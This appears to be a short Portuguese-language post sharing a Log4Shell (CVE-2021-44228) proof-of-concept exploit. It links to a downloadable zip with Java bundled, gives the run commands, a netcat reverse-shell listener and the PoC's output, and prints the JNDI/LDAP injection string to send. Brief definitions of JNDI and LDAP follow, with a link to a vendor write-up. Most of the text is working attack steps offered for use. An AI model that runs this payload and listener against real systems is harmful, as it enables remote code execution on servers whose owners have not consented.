Log4Shell Vulnerability Test Tool https://log4shell.tools/
Exploit com o java já incluso, para evitar criar conta etc..
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
pip install -r requirements.txt
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
nc -lvnp 9001
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
Conceito básico de log4j
O que é JNDI
É Interface é uma API Java para um serviço de diretório que permite que clientes de software Java descubram e pesquisem dados e recursos por meio de um nome
O que é LDAP
É um protocolo de acesso ao diretório o LDAP pode ser usado para validar nomes de usuário e senhas com servidores Docker, Jenkins, Kubernetes, Open VPN e Linux Samba . O logon único LDAP também pode ser usado por administradores de sistema para controlar o acesso a um banco de dados LDAP.
PARA QUEM QUISER SABER MAIS SOBRE A FALHA A SEGUE A DOC ABAIXO:
https://www.lunasec.io/docs/blog/log4j-zero-day/
EXPLOIT SEM O JAVA INCLUSO